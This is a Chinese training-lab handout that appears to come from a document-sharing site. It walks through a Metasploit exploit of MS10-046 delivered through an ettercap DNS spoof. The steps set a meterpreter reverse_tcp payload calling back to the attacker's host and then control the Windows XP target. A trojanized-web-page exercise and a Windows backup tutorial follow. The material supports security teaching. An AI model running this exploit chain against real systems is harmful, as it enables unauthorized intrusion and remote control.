


下載本文檔
版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、無利用漏洞進(jìn)行溢出攻擊及數(shù)據(jù)備份利用漏洞進(jìn)行溢出攻擊及數(shù)據(jù)備份1.1. 實(shí)訓(xùn)目的實(shí)訓(xùn)目的( (后果自負(fù)后果自負(fù)) )利用系統(tǒng)漏洞進(jìn)行溢出攻擊是一種現(xiàn)今網(wǎng)絡(luò)上常用的一種攻擊手段,它利用 C 等高級(jí)語言對(duì)于數(shù)據(jù)、指針以及寄存器等保護(hù)不足及程序員在開發(fā)系統(tǒng)時(shí)的過錯(cuò),通過多重手段屏蔽用戶感知,從而獲取用戶所傳遞信息或者誤導(dǎo)用戶的網(wǎng)絡(luò)應(yīng)用操作。 本次練習(xí)主要目的是體驗(yàn)利用漏洞進(jìn)行緩沖區(qū)溢出攻擊。數(shù)據(jù)備份是系統(tǒng)管理員日常進(jìn)行系統(tǒng)、數(shù)據(jù)維護(hù)所必需掌握的技巧及手段,本次練習(xí)應(yīng)用 windows2003 自帶的備份工具進(jìn)行數(shù)據(jù)備份。2.2. 實(shí)訓(xùn)所需條件及環(huán)境實(shí)訓(xùn)所需條件及環(huán)境硬件設(shè)備:硬件設(shè)備:局域網(wǎng)(含機(jī)柜
2、、配線架、交換機(jī)等) 、臺(tái)式 PC 機(jī)軟件支撐:軟件支撐:Windows 2003、Windows XP 以及 BackTract5 虛擬機(jī)網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu):網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu):3.3. 實(shí)訓(xùn)內(nèi)容實(shí)訓(xùn)內(nèi)容3.13.1 利用利用 metasploitmetasploit 進(jìn)行溢出攻擊練習(xí)進(jìn)行溢出攻擊練習(xí)使用 metasploit 開啟攻擊無首先是進(jìn)入 Metasploit??梢渣c(diǎn)擊【應(yīng)用程序】【BackTrack】【Exploitation Tools】【Network Exploitation Tools】【Metasploit Framewrok】進(jìn)入 Metasploit 外,也可以在圖形界面下打開
3、任意一個(gè)終端, 直接輸入 msfconsole 命令來進(jìn)入 Metasploit。此時(shí)可以看到當(dāng)前包含代碼數(shù)量、參數(shù)狀態(tài)及最新版本等,如下圖所示,進(jìn)入 msf 的工作平臺(tái)后,輸入 search ms10-046 查詢攻擊代碼的存放路徑, 即可看到名為ms10_046_shortcut_icon_dllloader的相關(guān)信息。接下來,使用如下指令載入攻擊代碼:Use windows/browser/ms10_046_shortcut_icon_dllloader回車后如下圖所示,表示載入攻擊代碼成功。此時(shí),可以通過 showoptions 來查看可以(必需)進(jìn)行的參數(shù)配置。無在了解需進(jìn)行的攻擊參
4、數(shù)的配置后,接下來就可以使用 set 命令來依次配置參數(shù)。其中,還需設(shè)置 PAYLOAD 為獲取 windows 的 shellcode,即 windows/metepreter/reverse_tcp。此外,由于后面攻擊還要使用 ettercap 對(duì)目標(biāo)進(jìn)行 DNS 欺騙攻擊,所以要將反彈端口的目的地設(shè)置為自身 IP,即設(shè)置 LHOST 為自身 IP。具體命令如下:setSRVHOST攻擊者自身 IPsetPAYLOADwindows/meterpreter/reverse_tcpsetLHOST攻擊者自身 IPexploit無進(jìn)行 dns 欺騙攻擊參照在欺騙攻擊練習(xí)中的操作敘述及練習(xí)視頻的
5、說明,完成對(duì)etter.dns 的配置。注意這里域名對(duì)應(yīng)的 ip 地址必需根據(jù)自己的機(jī)器的實(shí)際 ip 地址進(jìn)行。完成域名的配置后,使用 ifconfig 查看使用的網(wǎng)絡(luò)適配器的符號(hào),然后發(fā)起欺騙攻擊,如下圖所示。無入侵目標(biāo)主機(jī)目標(biāo)主機(jī) (Windows XP) 上打開瀏覽器, 輸入網(wǎng)址 http:/www.xxx并回車,會(huì)發(fā)現(xiàn)瀏覽器的響應(yīng)會(huì)變得緩慢。稍等數(shù)秒后,會(huì)發(fā)現(xiàn)在目標(biāo)主機(jī)上的瀏覽器上原本應(yīng)顯示為 www.xxx 的主頁, 突然變成了一個(gè)名為30XHJnSkKNjR 的共享目錄。如下圖所示。打開攻擊主機(jī) BackTrack5 的 Metasploit 終端下, 會(huì)看
6、到目標(biāo)主機(jī)因DNS 欺騙而導(dǎo)致的重定向訪問,此時(shí)目標(biāo)主機(jī)被強(qiáng)制運(yùn)行了攻擊主機(jī)即 30 上 Metasploit 執(zhí)行的漏洞攻擊代碼。 于是在成功溢出后,攻擊主機(jī)拿到了一個(gè)反向溢出 Shell。如下圖所示,即可獲無取到一個(gè) Meterpreter Session(注意倒數(shù)第三行) 。此時(shí),攻擊者輸入 back 命令回到 Metasploit 的根目錄后,就可以使用 sessions 查看這個(gè)反向溢出 Shell 的 ID 號(hào)及其相關(guān)信息, 然后再調(diào)用該 ID 即可。具體命令如下:sessionssessions-i1參數(shù)解釋:-i num 該參數(shù)用于調(diào)用不同 ID 號(hào)的成
7、功溢出 Shell,后跟的 num 為ID 號(hào)。無依次輸入上述命令,就可以成功調(diào)用該反向溢出 Shell,此時(shí)會(huì)看到提示符從msf變成了meterpreter,如下圖所示,此時(shí)鍵入 ps 即可看到目標(biāo)主機(jī)所有運(yùn)行的進(jìn)程。攻擊操作練習(xí)目標(biāo)主機(jī)打開計(jì)算器,如下圖所示,請(qǐng)你使用 linux 的 kill 指令將計(jì)算器的進(jìn)程殺除。使用命令 run getgui e,看看能否開啟目標(biāo)主機(jī)的運(yùn)程管理服務(wù)。3.23.2 掛馬攻擊練習(xí)掛馬攻擊練習(xí)無開啟 windows2003,并運(yùn)行 IIS 服務(wù)。然后使用如下指令,設(shè)計(jì)掛馬網(wǎng)頁。修改3.1中的dns 配置, 將域名對(duì)應(yīng)的ip地址指向windows2003,并
8、重復(fù) 3.1 的整個(gè)攻擊過程??纯丛谀繕?biāo)機(jī)器上,能否察覺被攻擊機(jī)入侵的痕跡?3.33.3 數(shù)據(jù)備份練習(xí)數(shù)據(jù)備份練習(xí)實(shí)驗(yàn)環(huán)境準(zhǔn)備啟動(dòng) windows2003(以下簡(jiǎn)稱主機(jī)) ,并配置 IIS 服務(wù)器。然后復(fù)制默認(rèn)網(wǎng)站工作目錄下的所有文件夾及其文件到“D:WebBackUp”目錄下。文件狀態(tài)查詢主機(jī)查詢備份前文件夾(即上面需要進(jìn)行備份的 IIS 默認(rèn)網(wǎng)站文件及文件夾)的狀態(tài)(文件夾中文件數(shù)量、名稱、大小),記錄其狀態(tài)為 S1。文件備份(1) 主機(jī)選擇“開始-所有程序-附件-系統(tǒng)工具-備份”菜單項(xiàng),彈出“備份或還原向?qū)А睂?duì)話框,單擊“下一步”按鈕。(2) 主機(jī)選擇“備份文件和設(shè)置(A)”單選按鈕,單
9、擊“下一步”按鈕。(3) 主機(jī)選擇 “讓我選擇要備份的內(nèi)容(L)” 單選按鈕, 單擊 “下無一步”按鈕。(4) 主機(jī)選擇備份項(xiàng)目為“D:WebBackUp” ,單擊“下一步”按鈕。(5) 主機(jī)選擇備份文件的位置為 “D:” , 備份文件名稱保持默認(rèn),單擊“下一步”按鈕。(6) 主機(jī)單擊“完成”按鈕,開始備份操作。(7) 稍等片刻后,完成備份操作。主機(jī)單擊“關(guān)閉”按鈕,關(guān)閉“備份進(jìn)度”對(duì)話框。原始文件刪除主機(jī)刪除“D:WebBackUp”文件夾及其文件。文件還原(1) 主機(jī)雙擊“D:Backup.bkf”文件,彈出“備份或還原向?qū)А睂?duì)話框,單擊“下一步”按鈕。(2) 主機(jī)選擇“還原文件和設(shè)置(R)”單選按鈕,單擊“下一步”按鈕。(3) 主機(jī)勾選要還原的項(xiàng)目為“D:Backup.bkf”,
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 評(píng)估個(gè)人發(fā)展?jié)摿τ?jì)劃
- 貴州省湄潭縣2025年數(shù)學(xué)八下期末達(dá)標(biāo)檢測(cè)模擬試題含解析
- 計(jì)算機(jī)二級(jí)VB編程題解析及答案
- 階段性學(xué)習(xí)評(píng)估標(biāo)準(zhǔn)計(jì)劃
- 軟件開發(fā)的最佳實(shí)踐試題及答案
- 家庭與學(xué)校美術(shù)教育合作計(jì)劃
- 優(yōu)化團(tuán)隊(duì)開發(fā)流程的戰(zhàn)略與方法試題及答案
- 城市交通樞紐規(guī)劃咨詢重點(diǎn)基礎(chǔ)知識(shí)點(diǎn)
- 2024年四川省交通運(yùn)輸廳下屬事業(yè)單位真題
- 計(jì)算機(jī)軟件考試詳細(xì)復(fù)習(xí)計(jì)劃試題及答案
- 江西省房屋市政工程專職安全生產(chǎn)管理人員安全日志
- 知行合一:王陽明傳
- 廣告宣傳欄及雕塑采購(gòu)項(xiàng)目服務(wù)投標(biāo)方案(技術(shù)標(biāo))
- 波浪理論基礎(chǔ)圖解
- 基于單片機(jī)的五岔路口交通燈方案設(shè)計(jì)
- 角的度量說課PPT
- 肥皂盒模具畢業(yè)設(shè)計(jì)
- 【輔助投籃機(jī)器人設(shè)計(jì)7600字(論文)】
- 山東財(cái)經(jīng)大學(xué)輔導(dǎo)員考試真題2022
- 電力QC小組成果報(bào)告電力QC小組成果報(bào)告八篇
- 《團(tuán)結(jié)友愛,和睦相處,建和諧班級(jí)》主題班會(huì)課件
評(píng)論
0/150
提交評(píng)論